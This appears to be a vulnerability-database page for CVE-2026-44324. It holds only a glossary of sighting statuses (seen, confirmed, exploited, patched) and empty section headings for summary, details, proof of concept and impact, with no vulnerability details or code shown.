Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-44324 (GCVE-0-2026-44324)

FKIE_CVE-2026-44324

GHSA-JQFC-GWJ5-3W63

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature